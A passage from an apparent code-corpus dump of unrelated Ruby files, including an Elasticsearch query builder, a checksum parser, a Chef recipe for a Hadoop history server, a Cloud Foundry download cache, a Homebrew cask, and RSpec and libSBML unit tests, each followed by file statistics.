assert_equal "0c9c30f60cadabd31415", note.digest
assert_equal Time.new(2010, 2, 11, 3, 46, 56), note.created_at
assert_equal Time.new(2010, 2, 11, 3, 47, 47), note.updated_at
assert_equal 19, note.length
assert_equal "This is a test note", note.text
end
end
| 30.851852 | 66 | 0.655462 |
6a83b44a637e94bde7bc600d598ae21821bb90e7 | 2,129 | module Dedup
module Elasticsearchable
extend ActiveSupport::Concern
included do
class << self
def searcher
BasicSearcher.new(self)
end
end
Hash.class_eval do
def contains_blank?
self.blank? || self.values.contains_blank?
end unless Hash.instance_methods.include?(:contains_blank?)
end
Array.class_eval do
def contains_blank?
self.blank? ||
self.map do |value|
if value.respond_to? :contains_blank?
value.contains_blank? and break
else
value.blank? and break
end
end.nil?
end unless Array.instance_methods.include?(:contains_blank?)
end
end
class BasicSearcher
def initialize(target_class)
@target_class = target_class
reset!
end
# 封装查询 ES 的逻辑
def search(page: 1, per: 20)
yield self if block_given?
@target_class.search(query).page(page).per(per)
end
def query
{
_source: @source,
sort: @sort,
query: {
filtered: {
filter: {
bool: {
must: @must_filters,
must_not: @must_not_filters
}
},
query: {
bool: {
should: @should_filters
}
}
}
}
}
end
def source(bool)
@source = bool
end
def sort(field, order)
[field, order].contains_blank? or @sort = {field => {order: order}}; self
end
%w[should must must_not].each do |action|
define_method action do |type, query|
[type, query].contains_blank? or self.send("#{action}_filters") << {type => query}; self
end
end
def reset!
@should_filters, @must_filters, @must_not_filters = [], [], []
@sort = {}
@source = true
end
private
attr_reader :should_filters, :must_filters, :must_not_filters
end
end
end
| 22.892473 | 98 | 0.509629 |
e8eb9703d1c6bb9a42b5f301b3880aece649c2ec | 1,628 | # frozen_string_literal: true
module HathiTrust::SIP
# Handles MD5 checksums in a checksum.md5 or similar format
class Checksums
# @return [Hash] all checksums in the given collection
attr_reader :checksums
# Initialize a new set of Checksums. Ignores directory names in the
# file names.
#
# @param checksum_file [IO] IO stream (or anything responding to
# #each_line) that contains a list of checksums and files
def initialize(checksum_file)
@checksums = {}
check_for_bom(checksum_file).each_line() do |line|
if m = line.strip.match(/\b[a-fA-F0-9]{32}\b/) and filename = extract_filename(m)
checksum = m.to_s.downcase
@checksums[File.basename(filename)] = checksum
end
end
end
def checksum_for(filename)
@checksums[filename]
end
private
def check_for_bom(checksum_file)
maybe_bom = checksum_file.bytes[0,2]
if maybe_bom == [0xFF,0xFE]
encoding = 'UTF-16LE'
elsif maybe_bom == [0xFE,0xFF]
encoding = 'UTF-16BE'
end
if encoding
checksum_file.force_encoding(encoding)[1..-1].encode("US-ASCII")
else
checksum_file
end
end
def extract_filename(match)
(match.pre_match.strip + match.post_match.strip).
# Remove delimeters & random asterisks that some md5 programs put in there.
# Hope nobody has legit filenames with leading or trailing commas or asterisks
gsub(/^[*,]/,'').
gsub(/[*,]$/,'').
# Handle windows-style paths
tr('\\','/').
downcase
end
end
end
| 27.59322 | 89 | 0.630835 |
797d443c2481092ccae6755928ab3e3d94e18da6 | 2,585 | include_recipe 'bcpc-hadoop::hadoop_config'
::Chef::Recipe.send(:include, Bcpc_Hadoop::Helper)
::Chef::Resource::Bash.send(:include, Bcpc_Hadoop::Helper)
%w{hadoop-mapreduce-historyserver}.each do |pkg|
package hwx_pkg_str(pkg, node[:bcpc][:hadoop][:distribution][:release]) do
action :install
end
hdp_select(pkg, node[:bcpc][:hadoop][:distribution][:active_release])
end
#
# The following resource is to fix incorrect permissions set in
# existing /user/history directory
#
bash "set-correct-user-history-dir-permission" do
code <<-EOH
hdfs dfs -chmod -R 0770 /user/history
hdfs dfs -chmod 1777 /user/history
hdfs dfs -chmod 1777 /user/history/done
hdfs dfs -chmod 1777 /user/history/done_intermediate
EOH
user "hdfs"
only_if "hdfs dfs -test -d /user/history && hdfs dfs -ls /user/history/done_intermediate|grep drwxrwxrwt", :user => "hdfs"
end
["", "done", "done_intermediate"].each do |dir|
bash "create-hdfs-history-dir #{dir}" do
code "hdfs dfs -mkdir /user/history/#{dir} && hdfs dfs -chmod 1777 /user/history/#{dir} && hdfs dfs -chown yarn:mapred /user/history/#{dir}"
user "hdfs"
not_if "hdfs dfs -test -d /user/history/#{dir}", :user => "hdfs"
end
end
configure_kerberos 'historyserver_spnego' do
service_name 'spnego'
end
configure_kerberos 'historyserver_kerb' do
service_name 'historyserver'
end
template "/etc/hadoop/conf/mapred-env.sh" do
source "hdp_mapred-env.sh.erb"
mode 0655
end
bash "create-hdfs-history-dir" do
code <<-EOH
hdfs dfs -mkdir -p /var/log/hadoop-yarn/apps
hdfs dfs -chmod -R 1777 /var/log/hadoop-yarn/apps
EOH
user "hdfs"
not_if "hdfs dfs -test -d /var/log/hadoop-yarn/apps", :user => "hdfs"
end
link "/etc/init.d/hadoop-mapreduce-historyserver" do
to "/usr/hdp/#{node[:bcpc][:hadoop][:distribution][:active_release]}/hadoop-mapreduce/etc/init.d/hadoop-mapreduce-historyserver"
notifies :run, 'bash[kill mapred-historyserver]', :immediate
end
bash "kill mapred-historyserver" do
code "pkill -u mapred -f historyserver"
action :nothing
returns [0, 1]
end
service "hadoop-mapreduce-historyserver" do
supports :status => true, :restart => true, :reload => false
action [:enable, :start]
subscribes :restart, "link[/etc/init.d/hadoop-mapreduce-historyserver]", :immediate
subscribes :restart, "template[/etc/hadoop/conf/hadoop-env.sh]", :delayed
subscribes :restart, "template[/etc/hadoop/conf/mapred-site.xml]", :delayed
subscribes :restart, "template[/etc/hadoop/conf/yarn-site.xml]", :delayed
subscribes :restart, "log[jdk-version-changed]", :delayed
end
| 33.141026 | 144 | 0.72147 |
b9c0739ac89f98a21d4c0372dea1cbd9825df468 | 1,436 | describe "DELETE /authorised_email_domains/:id", type: :request do
let!(:email_domain) { create(:authorised_email_domain, name: "some.domain.org.uk") }
let(:regex_gateway) { instance_spy(Gateways::S3, write: nil) }
let(:email_domains_gateway) { instance_spy(Gateways::S3) }
before { allow(Gateways::S3).to receive(:new).and_return(regex_gateway, email_domains_gateway) }
context "when the user is a super admin" do
before do
https!
sign_in_user(create(:user, :super_admin, :with_organisation))
end
it "deletes the email domain" do
expect {
delete super_admin_whitelist_email_domain_path(email_domain)
}.to change(AuthorisedEmailDomain, :count).by(-1)
end
it "publishes the new regex list of authorised domains to S3" do
delete super_admin_whitelist_email_domain_path(email_domain)
expect(regex_gateway).to have_received(:write)
end
it "publishes the new list of email domains to S3" do
delete super_admin_whitelist_email_domain_path(email_domain)
expect(email_domains_gateway).to have_received(:write)
end
end
context "when the user is not super admin" do
before do
https!
sign_in_user(create(:user))
end
it "does not delete the email domain" do
expect {
delete super_admin_whitelist_email_domain_path(email_domain)
}.to change(AuthorisedEmailDomain, :count).by(0)
end
end
end
| 32.636364 | 98 | 0.714485 |
3827cb5108460fc70fa0052e75861c2860fc1014 | 990 | # frozen_string_literal: true
describe Spotlight::ViewConfigurationsController, type: :controller do
routes { Spotlight::Engine.routes }
let(:exhibit) { FactoryBot.create(:exhibit) }
describe 'when the user is not authorized' do
before do
sign_in FactoryBot.create(:exhibit_visitor)
end
describe 'GET show' do
it 'denies access' do
get :show, params: { exhibit_id: exhibit }
expect(response).to redirect_to main_app.root_path
expect(flash[:alert]).to be_present
end
end
end
describe 'when signed in' do
let(:user) { FactoryBot.create(:exhibit_admin, exhibit: exhibit) }
before { sign_in user }
describe 'GET show' do
it 'is successful' do
get :show, params: { exhibit_id: exhibit, format: 'json' }
expect(response).to be_successful
available = JSON.parse(response.body)
expect(available).to match_array %w[list gallery masonry slideshow]
end
end
end
end
| 27.5 | 75 | 0.670707 |
f8d1d39a6188e5115376ac56dbfeee48effae9de | 407 | # frozen_string_literal: true
# This migration comes from spina_admin_conferences_engine (originally 20200420120946)
class RemoveTitleAndAbstractFromSpinaConferencesPresentations < ActiveRecord::Migration[6.0] # :nodoc:
def change
remove_column :spina_conferences_presentations, :title, :string, null: false
remove_column :spina_conferences_presentations, :abstract, :text, null: false
end
end
| 40.7 | 102 | 0.818182 |
62bda850bd69216dd3a9c776450756fdbaf3da9e | 9,917 | # Encoding: utf-8
# Cloud Foundry Java Buildpack
# Copyright 2013 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'fileutils'
require 'java_buildpack/diagnostics'
require 'java_buildpack/diagnostics/logger_factory'
require 'java_buildpack/util'
require 'monitor'
require 'net/http'
require 'tmpdir'
require 'uri'
require 'yaml'
module JavaBuildpack::Util
# A cache for downloaded files that is configured to use a filesystem as the backing store. This cache uses standard
# file locking (<tt>File.flock()</tt>) in order ensure that mutation of files in the cache is non-concurrent across
# processes. Reading files (once they've been downloaded) happens concurrently so read performance is not impacted.
class DownloadCache
# Creates an instance of the cache that is backed by the filesystem rooted at +cache_root+
#
# @param [String] cache_root the filesystem root for downloaded files to be cached in
def initialize(cache_root = Dir.tmpdir)
Dir.mkdir(cache_root) unless File.exists? cache_root
@cache_root = cache_root
@logger = JavaBuildpack::Diagnostics::LoggerFactory.get_logger
end
# Retrieves an item from the cache. Retrieval of the item uses the following algorithm:
#
# 1. Obtain an exclusive lock based on the URI of the item. This allows concurrency for different items, but not for
# the same item.
# 2. If the the cached item does not exist, download from +uri+ and cache it, its +Etag+, and its +Last-Modified+
# values if they exist.
# 3. If the cached file does exist, and the original download had an +Etag+ or a +Last-Modified+ value, attempt to
# download from +uri+ again. If the result is +304+ (+Not-Modified+), then proceed without changing the cached
# item. If it is anything else, overwrite the cached file and its +Etag+ and +Last-Modified+ values if they exist.
# 4. Downgrade the lock to a shared lock as no further mutation of the cache is possible. This allows concurrency for
# read access of the item.
# 5. Yield the cached file (opened read-only) to the passed in block. Once the block is complete, the file is closed
# and the lock is released.
#
# @param [String] uri the uri to download if the item is not already in the cache. Also used in the case where the
# item is already in the cache, to validate that the item is up to date
# @yieldparam [File] file the file representing the cached item. In order to ensure that the file is not changed or
# deleted while it is being used, the cached item can only be accessed as part of a block.
# @return [void]
def get(uri)
internet_up = DownloadCache.internet_available? uri, @logger
filenames = filenames(uri)
File.open(filenames[:lock], File::CREAT) do |lock_file|
lock_file.flock(File::LOCK_EX)
if internet_up && should_update(filenames)
update(filenames, uri)
elsif should_download(filenames)
download(filenames, uri, internet_up)
end
lock_file.flock(File::LOCK_SH)
File.open(filenames[:cached], File::RDONLY) do |cached_file|
yield cached_file
end
end
end
# Remove an item from the cache
#
# @param [String] uri the URI of the item to remove
# @return [void]
def evict(uri)
filenames = filenames(uri)
File.open(filenames[:lock], File::CREAT) do |lock_file|
lock_file.flock(File::LOCK_EX)
delete_file filenames[:cached]
delete_file filenames[:etag]
delete_file filenames[:last_modified]
delete_file filenames[:lock]
end
end
private
CACHE_CONFIG = '../../../config/cache.yml'.freeze
HTTP_ERRORS = [
EOFError,
Errno::ECONNREFUSED,
Errno::ECONNRESET,
Errno::EHOSTUNREACH,
Errno::EINVAL,
Errno::EPIPE,
Errno::ETIMEDOUT,
Net::HTTPBadResponse,
Net::HTTPHeaderSyntaxError,
Net::ProtocolError,
SocketError,
Timeout::Error
].freeze
HTTP_OK = '200'.freeze
@@monitor = Monitor.new
@@internet_checked = false
@@internet_up = true
def self.get_configuration
expanded_path = File.expand_path(CACHE_CONFIG, File.dirname(__FILE__))
YAML.load_file(expanded_path)
end
TIMEOUT_SECONDS = 10
def self.internet_available?(uri, logger)
@@monitor.synchronize do
return @@internet_up if @@internet_checked
end
cache_configuration = get_configuration
if cache_configuration['remote_downloads'] == 'disabled'
store_internet_availability false
elsif cache_configuration['remote_downloads'] == 'enabled'
begin
rich_uri = URI(uri)
# Beware known problems with timeouts: https://www.ruby-forum.com/topic/143840
Net::HTTP.start(rich_uri.host, rich_uri.port, read_timeout: TIMEOUT_SECONDS, connect_timeout: TIMEOUT_SECONDS, open_timeout: TIMEOUT_SECONDS) do |http|
request = Net::HTTP::Get.new(uri)
http.request request do |response|
internet_up = response.code == HTTP_OK
store_internet_availability internet_up
end
end
rescue *HTTP_ERRORS => ex
logger.debug { "Internet detection failed with #{ex}" }
store_internet_availability false
end
else
raise "Invalid remote_downloads property in cache configuration: #{cache_configuration}"
end
end
def self.store_internet_availability(internet_up)
@@monitor.synchronize do
@@internet_up = internet_up
@@internet_checked = true
end
internet_up
end
def delete_file(filename)
File.delete filename if File.exists? filename
end
def download(filenames, uri, internet_up)
if internet_up
begin
rich_uri = URI(uri)
Net::HTTP.start(rich_uri.host, rich_uri.port, use_ssl: use_ssl?(rich_uri)) do |http|
request = Net::HTTP::Get.new(uri)
http.request request do |response|
write_response(filenames, response)
end
end
rescue *HTTP_ERRORS => ex
puts 'FAIL'
error_message = "Unable to download from #{uri} due to #{ex}"
raise error_message
end
else
look_aside(filenames, uri)
end
end
def filenames(uri)
key = URI.escape(uri, '/')
{
cached: File.join(@cache_root, "#{key}.cached"),
etag: File.join(@cache_root, "#{key}.etag"),
last_modified: File.join(@cache_root, "#{key}.last_modified"),
lock: File.join(@cache_root, "#{key}.lock")
}
end
# A download has failed, so check the read-only buildpack cache for the file
# and use the copy there if it exists.
def look_aside(filenames, uri)
@logger.debug "Unable to download from #{uri}. Looking in buildpack cache."
key = URI.escape(uri, '/')
stashed = File.join(ENV['BUILDPACK_CACHE'], 'java-buildpack', "#{key}.cached")
@logger.debug { "Looking in buildpack cache for file '#{stashed}'" }
if File.exist? stashed
FileUtils.cp(stashed, filenames[:cached])
@logger.debug "Using copy of #{uri} from buildpack cache."
else
message = "Buildpack cache does not contain #{uri}. Failing the download."
@logger.error message
@logger.debug { "Buildpack cache contents:\n#{`ls -lR #{File.join(ENV['BUILDPACK_CACHE'], 'java-buildpack')}`}" }
raise message
end
end
def persist_header(response, header, filename)
unless response[header].nil?
File.open(filename, File::CREAT | File::WRONLY) do |file|
file.write(response[header])
file.fsync
end
end
end
def set_header(request, header, filename)
if File.exists?(filename)
File.open(filename, File::RDONLY) do |file|
request[header] = file.read
end
end
end
def should_download(filenames)
!File.exists?(filenames[:cached])
end
def should_update(filenames)
File.exists?(filenames[:cached]) && (File.exists?(filenames[:etag]) || File.exists?(filenames[:last_modified]))
end
def update(filenames, uri)
rich_uri = URI(uri)
Net::HTTP.start(rich_uri.host, rich_uri.port, use_ssl: use_ssl?(rich_uri)) do |http|
request = Net::HTTP::Get.new(uri)
set_header request, 'If-None-Match', filenames[:etag]
set_header request, 'If-Modified-Since', filenames[:last_modified]
http.request request do |response|
write_response(filenames, response) unless response.code == '304'
end
end
rescue *HTTP_ERRORS => ex
@logger.warn "Unable to update from #{uri} due to #{ex}. Using cached version."
end
def use_ssl?(uri)
uri.scheme == 'https'
end
def write_response(filenames, response)
persist_header response, 'Etag', filenames[:etag]
persist_header response, 'Last-Modified', filenames[:last_modified]
File.open(filenames[:cached], File::CREAT | File::WRONLY) do |cached_file|
response.read_body do |chunk|
cached_file.write(chunk)
end
end
end
end
end
| 35.291815 | 161 | 0.655037 |
ab87dac7f8674b635fad6cc66d2a1ba1a83b7261 | 541 | module Cache
class AdditionalCodeIndex < ::Cache::CacheIndex
def definition
{
mappings: {
dynamic: false,
properties: {
additional_code: { type: 'keyword' },
additional_code_type_id: { type: 'keyword' },
description: { type: 'text', analyzer: 'snowball' },
validity_start_date: { type: 'date', format: 'date_optional_time' },
validity_end_date: { type: 'date', format: 'date_optional_time' },
}
}
}
end
end
end
| 28.473684 | 80 | 0.548983 |
7a8b0b5659e5586674e7a060b59164fd646d1793 | 464 | class TapsController < ApplicationController
respond_to :json, :only => [:index, :show, :update]
before_filter :find_beer_tap, :only => [:show, :update]
def index
respond_with(BeerTap.all)
end
def show
respond_with(@beer_tap)
end
def update
keg = Keg.find(params[:keg_id])
@beer_tap.keg = keg
@beer_tap.save
respond_with(@beer_tap)
end
private
def find_beer_tap
@beer_tap = BeerTap.find(params[:id])
end
end
| 17.185185 | 57 | 0.672414 |
e28d2ca553643334b60c97ca034261bd90950bd0 | 1,307 | # frozen_string_literal: true
require 'spec_helper'
# This test serves as a regression test for a bug that caused an error
# message to be shown by JavaScript when the source branch was deleted.
# Please do not remove ":js".
describe 'Merge request > User sees MR with deleted source branch', :js do
let(:project) { create(:project, :public, :repository) }
let(:merge_request) { create(:merge_request, source_project: project) }
let(:user) { project.creator }
before do
stub_feature_flags(single_mr_diff_view: false)
merge_request.update!(source_branch: 'this-branch-does-not-exist')
sign_in(user)
visit project_merge_request_path(project, merge_request)
end
it_behaves_like 'rendering a single diff version'
it 'shows a message about missing source branch' do
expect(page).to have_content('Source branch does not exist.')
end
it 'still contains Discussion, Commits and Changes tabs' do
within '.merge-request-details' do
expect(page).to have_content('Overview')
expect(page).to have_content('Commits')
expect(page).to have_content('Changes')
end
expect(page).to have_content('Source branch does not exist.')
click_on 'Changes'
wait_for_requests
expect(page).to have_selector('.diffs.tab-pane .file-holder')
end
end
| 31.878049 | 74 | 0.730681 |
39e4682447c22b34a35863e4c75956552f13a708 | 2,206 | # ref. http://pocke.hatenablog.com/entry/2016/01/16/155004
namespace :db do
# desc 'Generate model files from db schema'
desc 'スキーマからモデルを生成'
task gen: :environment do
module ModelGenerator
Models = {}
module Evaluator
module_function
def create_table(table_name, *)
Models[table_name.classify] = {
has_many: [],
belongs_to: [],
}
end
# 無視
def add_index(*) end
def add_foreign_key(from, to)
fromc, toc = from.classify, to.classify
Models[fromc][:belongs_to].push to.singularize
Models[toc][:has_many].push from
end
end
def self.save
Models.each do |klass, data|
code = [
"class #{klass} < ApplicationRecord",
data[:has_many].map{|x| " has_many :#{x}"},
data[:belongs_to].map{|x| " belongs_to :#{x}"},
"end\n",
].flatten.join("\n")
path = Rails.root.join('app', 'models', "#{klass.underscore}.rb")
debugger
File.write(path, code) unless File.exist?(path)
end
end
end
s = ActiveRecord::Schema
def s.define(*, &block)
ModelGenerator::Evaluator.class_eval(&block)
end
load Rails.root.join('db', 'schema.rb')
ModelGenerator.save
end
desc 'seed データのdump'
task seed_dump: :environment do
target_tables.each do |table|
model = table.classify.constantize
puts "#{model} - #{model.all.size}"
next if model.all.empty?
SeedFu::Writer.write("db/fixtures/#{table}.rb", class_name: table.classify) do |writer|
model.order(:id).find_each do |rec|
edit_attrs = rec.attributes
edit_attrs.delete("deleted_at")
edit_attrs.each_pair do |key, val|
if edit_attrs[key].is_a?(ActiveSupport::TimeWithZone) || edit_attrs[key].is_a?(Date)
edit_attrs[key] = edit_attrs[key].to_s
end
end
writer << edit_attrs
end
end
end
end
def target_tables
%w[systems customers]
end
end
| 27.575 | 97 | 0.550771 |
1846ba47e01a34f5466a9869d13d66897dc29143 | 4,464 | require 'rails_helper'
if ExchangeTestingConfigurationHelper.general_agency_enabled?
RSpec.describe ShopGeneralAgencyNotices::GeneralAgencyHiredNotice, :dbclean => :after_each do
let!(:hbx_profile) { FactoryBot.create(:hbx_profile, organization: organization) }
let!(:person) { FactoryBot.create(:person, :with_work_email, :with_hbx_staff_role) }
let!(:general_agency_profile) {
general_agency_staff_role.unset(:benefit_sponsors_general_agency_profile_id) # ToDo - Fix/Move to new model
general_agency_staff_role.general_agency_profile
}
let!(:general_agency_staff_role) {FactoryBot.create(:general_agency_staff_role, person: person)}
let!(:organization) {FactoryBot.create(:organization)}
let!(:employer_profile) { FactoryBot.create(:employer_profile, general_agency_profile: general_agency_profile) }
let!(:broker_agency_profile) { FactoryBot.create(:broker_agency_profile, organization: organization ) }
let!(:broker_role) { broker_agency_profile.primary_broker_role }
let!(:application_event){ double("ApplicationEventKind",{
:name =>'General Agency hired notification',
:notice_template => 'notices/shop_general_agency_notices/general_agency_hired_notice',
:notice_builder => 'ShopGeneralAgencyNotices::GeneralAgencyHiredNotice',
:mpi_indicator => 'SHOP_D085',
:event_name => 'general_agency_hired_notice',
:title => "Employer has hired you as a General agency"})
}
let!(:valid_params) {{
:subject => application_event.title,
:mpi_indicator => application_event.mpi_indicator,
:event_name => application_event.event_name,
:template => application_event.notice_template,
:options => {
:employer_profile_id => employer_profile.id.to_s
}
}}
before do
@general_agency_notice = ShopGeneralAgencyNotices::GeneralAgencyHiredNotice.new(general_agency_profile, valid_params)
allow(general_agency_profile).to receive(:general_agency_staff_roles).and_return([general_agency_staff_role])
end
describe "New" do
context "valid params" do
it "should initialze" do
expect{ShopGeneralAgencyNotices::GeneralAgencyHiredNotice.new(general_agency_profile, valid_params)}.not_to raise_error
end
end
context "invalid params" do
[:mpi_indicator,:subject,:template].each do |key|
it "should NOT initialze with out #{key}" do
valid_params.delete(key)
expect{ShopGeneralAgencyNotices::GeneralAgencyHiredNotice.new(general_agency_profile, valid_params)}.to raise_error(RuntimeError,"Required params #{key} not present")
end
end
end
end
describe "Build" do
it "should build notice with all necessory info" do
@general_agency_notice.build
expect(@general_agency_notice.notice.primary_fullname).to eq person.full_name.titleize
end
end
describe "append data" do
before :each do
person.employer_staff_roles.create!(employer_profile_id: employer_profile.id)
employer_profile.broker_agency_accounts.create!(broker_agency_profile_id: broker_agency_profile.id, start_on: TimeKeeper.date_of_record - 35.days)
end
it "should append employer staff name" do
@general_agency_notice.append_data
expect(@general_agency_notice.notice.general_agency.employer_fullname).to eq employer_profile.staff_roles.first.full_name.titleize
end
it "should append employer legal name" do
@general_agency_notice.append_data
expect(@general_agency_notice.notice.general_agency.employer).to eq employer_profile.organization.legal_name
end
it "should append broker_fullname" do
@general_agency_notice.append_data
expect(@general_agency_notice.notice.general_agency.broker_fullname).to eq broker_role.person.full_name
end
describe "for generating pdf" do
it "should generate pdf" do
@general_agency_notice.build
@general_agency_notice.append_data
file = @general_agency_notice.generate_pdf_notice
expect(File.exist?(file.path)).to be true
end
end
end
describe "should render template" do
it "render broker_fires_default_ga_notice" do
expect(@general_agency_notice.template).to eq "notices/shop_general_agency_notices/general_agency_hired_notice"
end
end
end
end
| 44.19802 | 176 | 0.730735 |
bf9845d2e7da28d4b13c48b0b6de8d21ec9219fb | 4,840 | # @file TestL3LocalParameter.rb
# @brief L3 Local Parameter unit tests
#
# @author Akiya Jouraku (Ruby conversion)
# @author Sarah Keating
#
#
# ====== WARNING ===== WARNING ===== WARNING ===== WARNING ===== WARNING ======
#
# DO NOT EDIT THIS FILE.
#
# This file was generated automatically by converting the file located at
# src/sbml/test/TestL3LocalParameter.c
# using the conversion program dev/utilities/translateTests/translateTests.pl.
# Any changes made here will be lost the next time the file is regenerated.
#
# -----------------------------------------------------------------------------
# This file is part of libSBML. Please visit http://sbml.org for more
# information about SBML, and the latest version of libSBML.
#
# Copyright 2005-2010 California Institute of Technology.
# Copyright 2002-2005 California Institute of Technology and
# Japan Science and Technology Corporation.
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation. A copy of the license agreement is provided
# in the file named "LICENSE.txt" included with this software distribution
# and also available online as http://sbml.org/software/libsbml/license.html
# -----------------------------------------------------------------------------
require 'test/unit'
require 'libSBML'
class TestL3LocalParameter < Test::Unit::TestCase
def isnan(x)
return (x != x)
end
def setup
@@p = LibSBML::LocalParameter.new(3,1)
if (@@p == nil)
end
end
def teardown
@@p = nil
end
def test_L3_LocalParameter_NS
assert( @@p.getNamespaces() != nil )
assert( @@p.getNamespaces().getLength() == 1 )
assert (( "http://www.sbml.org/sbml/level3/version1/core" == @@p.getNamespaces().getURI(0) ))
end
def test_L3_LocalParameter_create
assert( @@p.getTypeCode() == LibSBML::SBML_LOCAL_PARAMETER )
assert( @@p.getMetaId() == "" )
assert( @@p.getNotes() == nil )
assert( @@p.getAnnotation() == nil )
assert( @@p.getId() == "" )
assert( @@p.getName() == "" )
assert( @@p.getUnits() == "" )
assert_equal true, isnan(@@p.getValue())
assert_equal false, @@p.isSetId()
assert_equal false, @@p.isSetName()
assert_equal false, @@p.isSetValue()
assert_equal false, @@p.isSetUnits()
end
def test_L3_LocalParameter_createWithNS
xmlns = LibSBML::XMLNamespaces.new()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = LibSBML::SBMLNamespaces.new(3,1)
sbmlns.addNamespaces(xmlns)
p = LibSBML::LocalParameter.new(sbmlns)
assert( p.getTypeCode() == LibSBML::SBML_LOCAL_PARAMETER )
assert( p.getMetaId() == "" )
assert( p.getNotes() == nil )
assert( p.getAnnotation() == nil )
assert( p.getLevel() == 3 )
assert( p.getVersion() == 1 )
assert( p.getNamespaces() != nil )
assert( p.getNamespaces().getLength() == 2 )
assert( p.getId() == "" )
assert( p.getName() == "" )
assert( p.getUnits() == "" )
assert_equal true, isnan(p.getValue())
assert_equal false, p.isSetId()
assert_equal false, p.isSetName()
assert_equal false, p.isSetValue()
assert_equal false, p.isSetUnits()
p = nil
end
def test_L3_LocalParameter_free_NULL
end
def test_L3_LocalParameter_hasRequiredAttributes
p = LibSBML::LocalParameter.new(3,1)
assert_equal false, p.hasRequiredAttributes()
p.setId( "id")
assert_equal true, p.hasRequiredAttributes()
p = nil
end
def test_L3_LocalParameter_id
id = "mitochondria";
assert_equal false, @@p.isSetId()
@@p.setId(id)
assert (( id == @@p.getId() ))
assert_equal true, @@p.isSetId()
if (@@p.getId() == id)
end
end
def test_L3_LocalParameter_name
name = "My_Favorite_Factory";
assert_equal false, @@p.isSetName()
@@p.setName(name)
assert (( name == @@p.getName() ))
assert_equal true, @@p.isSetName()
if (@@p.getName() == name)
end
@@p.unsetName()
assert_equal false, @@p.isSetName()
if (@@p.getName() != nil)
end
end
def test_L3_LocalParameter_units
units = "volume";
assert_equal false, @@p.isSetUnits()
@@p.setUnits(units)
assert (( units == @@p.getUnits() ))
assert_equal true, @@p.isSetUnits()
if (@@p.getUnits() == units)
end
@@p.unsetUnits()
assert_equal false, @@p.isSetUnits()
if (@@p.getUnits() != nil)
end
end
def test_L3_LocalParameter_value
assert_equal false, @@p.isSetValue()
assert_equal true, isnan(@@p.getValue())
@@p.setValue(1.5)
assert_equal true, @@p.isSetValue()
assert( @@p.getValue() == 1.5 )
@@p.unsetValue()
assert_equal false, @@p.isSetValue()
assert_equal true, isnan(@@p.getValue())
end
end
| 30.828025 | 101 | 0.631818 |
f7bc0a4b75b52c398298024d454e9d2666e75661 | 790 | cask "fog" do
version "1.4.5"
sha256 "dbf1216fce69ead08e9e9a37b18391d3d65e7f06ae4e6f633e7047832c6b1adc"
url "https://github.com/vitorgalvao/fog/releases/download/#{version}/Fog-#{version}-mac.zip"
name "Fog"
desc "Unofficial overcast.fm podcast app"
homepage "https://github.com/vitorgalvao/fog"
app "Fog.app"
uninstall quit: "com.vitorgalvao.fog"
zap trash: [
"~/Library/Application Support/Fog",
"~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.vitorgalvao.fog.sfl*",
"~/Library/Caches/Fog",
"~/Library/Preferences/com.vitorgalvao.fog.helper.plist",
"~/Library/Preferences/com.vitorgalvao.fog.plist",
"~/Library/Saved Application State/com.vitorgalvao.fog.savedState",
]
end
| 34.347826 | 140 | 0.744304 |
5ddce112005241fab8c2e8b9a869bbf65e6306c5 | 3,103 | require 'rails_helper'
RSpec.describe Api::V4::SplitRegistriesController, type: :controller do
describe "#show" do
before do
allow(Rails.configuration).to receive(:experience_sampling_weight).and_return(10)
end
it "includes sampling weight" do
get :show, params: { build_timestamp: '2019-11-11T14:35:30Z' }
expect(response).to have_http_status :ok
expect(response_json['experience_sampling_weight']).to eq(10)
end
context "without active split on given timestamp" do
let!(:split_1) { FactoryBot.create :split, name: "one", finished_at: Time.zone.parse('2019-11-13'), registry: { all: 100 } }
it "returns empty with no active splits on the timestamp" do
expect(split_1).to be_finished
get :show, params: { build_timestamp: '2019-11-14T14:35:30Z' }
expect(response).to have_http_status :ok
expect(response_json['splits']).to eq([])
end
end
context "with splits active on given during timestamp" do
let(:split_1) { FactoryBot.create :split, name: "one", finished_at: Time.zone.parse('2019-11-13'), registry: { all: 100 } }
let(:split_2) { FactoryBot.create :split, name: "two", registry: { on: 50, off: 50 } }
let(:split_3) { FactoryBot.create :split, name: "three_enabled", registry: { true: 99, false: 1 }, feature_gate: true }
it "returns the full split registry of splits that are active during timestamp" do
expect(split_1).to be_finished
expect(split_2).not_to be_finished
expect(split_3).not_to be_finished
get :show, params: { build_timestamp: '2019-11-12T14:35:30Z' }
expect(response).to have_http_status :ok
expect(response_json['splits']).to eq([
{
"name" => "one",
"variants" => [
{
"name" => "all",
"weight" => 100
}
],
"feature_gate" => false
},
{
"name" => "two",
"variants" => [
{
"name" => "on",
"weight" => 50
},
{
"name" => "off",
"weight" => 50
}
],
"feature_gate" => false
},
{
"name" => "three_enabled",
"variants" => [
{
"name" => "true",
"weight" => 99
},
{
"name" => "false",
"weight" => 1
}
],
"feature_gate" => true
}
])
end
end
it "returns unprocessable_entity if the timestamp url param is invalid" do
get :show, params: { build_timestamp: "2019-04-16 10:38:08 -0400" }
expect(response).to have_http_status :unprocessable_entity
end
it "returns unprocessable_entity if the timestamp url param is missing" do
get :show, params: { build_timestamp: "" }
expect(response).to have_http_status :unprocessable_entity
end
end
end
| 31.663265 | 130 | 0.540445 |
18795cf1ad667a4d6b4d3c1703a561dda48f1413 | 339 | Rails.application.routes.draw do
get '/home', to: 'static_pages#home'
get '/help', to: 'static_pages#help'
get '/about', to: 'static_pages#about'
get '/contact', to: 'static_pages#contact'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
root 'static_pages#home'
end
| 24.214286 | 101 | 0.702065 |
61f581e88e16d7b8fef3c4d2bf2bddb6f264cd29 | 432 | module WindowBlessing
module Widgets
class Label < WindowBlessing::Window
